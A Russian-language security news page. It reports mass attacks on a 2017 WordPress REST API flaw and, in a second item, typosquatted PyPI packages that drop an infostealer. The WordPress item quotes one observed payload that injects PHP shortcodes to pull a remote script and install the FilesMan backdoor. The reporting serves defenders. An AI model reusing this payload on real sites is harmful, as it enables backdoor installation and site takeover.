Атаки на уязвимость в WordPress REST API нужны для установки бэкдоров

Атаки на уязвимость в WordPress REST API нужны для установки бэкдоров

Массовые атаки на свежую уязвимость в WordPress REST API, исправленную в конце января 2017 года, продолжаются. На прошлой неделе мы рассказывали, что по данным компании WordFence, уязвимость привлекла внимание как минимум 20 хакерских групп, которым удалось скомпрометировать более 1,5 млн страниц.

В настоящий момент количество пострадавших страниц перевалило за два миллиона, а атаки постепенно становятся серьезнее, как и прогнозировали специалисты.

Напомню, что свежая уязвимость была устранена с выходом WordPress 4.7.2, еще 26 января 2017 года. Баг обнаружили специалисты компании Sucuri, и они описывают его как неавторизованную эскалацию привилегий через REST API. Уязвимости подвержены версии 4.7.0 и 4.7.1. Однако публичное раскрытие информации о проблеме состоялось только неделю спустя, так как разработчики хотели, чтобы как можно больше сайтов спокойно установили обновления, пишет xakep.ru.

Уязвимость позволяет неавторизованному атакующему сформировать специальный запрос, при помощи которого можно будет изменять и удалять содержимое любого поста на целевом сайте. Кроме того, используя шорткоды плагинов, злоумышленник может эксплуатировать и другие уязвимости CMS, которые обычно недоступны даже пользователям с высокими привилегиями. В итоге атакующий может внедрить на страницы сайта SEO-спам, рекламу, и даже исполняемый PHP-код, все зависит от доступных плагинов.

Эксперты компании Sucuri заметили, что от простых дефейсов злоумышленники перешли к попыткам удаленного выполнения произвольного кода. Для этих целей хакеры используют плагины Insert PHP (100 000+ установок), Exec-PHP (100 000+ установок) и им подобные. Такие плагины позволяют внедрять PHP-код в посты, чтобы сделать кастомизацию проще.

Исследователи пишут, что теперь дефейс-сообщения хакеров содержат шорткоды для вышеупомянутых плагинов. То есть добавив к своим дефейсам PHP-код, злоумышленники могут добиться его выполнения. В блоге компании эксперты приводят следующий пример, замеченный ими в ходе изучения атак:

content:»[insert_php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/insert_php]
[php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/php]»,
«id»:»61a»}

Данный пример приводит к скачиванию бэкдора FilesMan и его установке в директорию /wp-content/uploads/.

Теперь специалисты Sucuri рекомендуют администраторам отключить все потенциально опасные плагины и обновиться до WordPress 4.7.2, если они по какой-то причине еще этого не сделали. Исследователи поясняют, что такие атаки – это способ монетизации уязвимости. Тогда как обычными дефейсами много не заработаешь, размещение бекдора на сервере жертвы позволяет злоумышленникам вернуться позже, даже после устранения оригинальной уязвимости, и разместить на скомпрометированном ресурсе SEO-спам, рекламу или малварь.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

PyPI приостановил регистрацию новых пользователей из-за вредоноса

Популярный репозиторий Python Package Index (PyPI) ограничил возможность регистрации новых пользователей после масштабной вредоносной кампании по распространению трояна, похищающего данные.

PyPI — одно из первых мест, куда идут разработчики на Python, пытаясь найти нужные пакеты. Из-за популярности репозиторий не раз становился объектом внимания киберпреступников.

Именно такую кампанию злоумышленники запустили на днях, из-за чего администраторам PyPI пришлось приостановить регистрацию новых пользователей на площадке.

 

О кибероперации также написали исследователи из Checkmarx. По их словам, атакующие сразу начали с загрузки 365 пакетов, чьи имена были замаскированы под легитимные проекты.

Все злонамеренные пакеты включали вредоносный код в файле «setup.py», который выполнялся в процессе установки. Этот код пытается получить дополнительный пейлоад с удалённого сервера.

Для ухода от детектирования вредонос зашифрован с помощь модуля Fernet, а URL командного центра собирается динамически при необходимости.

Конечный пейлоад представляет собой троян, ворующий данные пользователей, сохранённые в браузерах: логины и пароли, cookies и крипторасширения.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru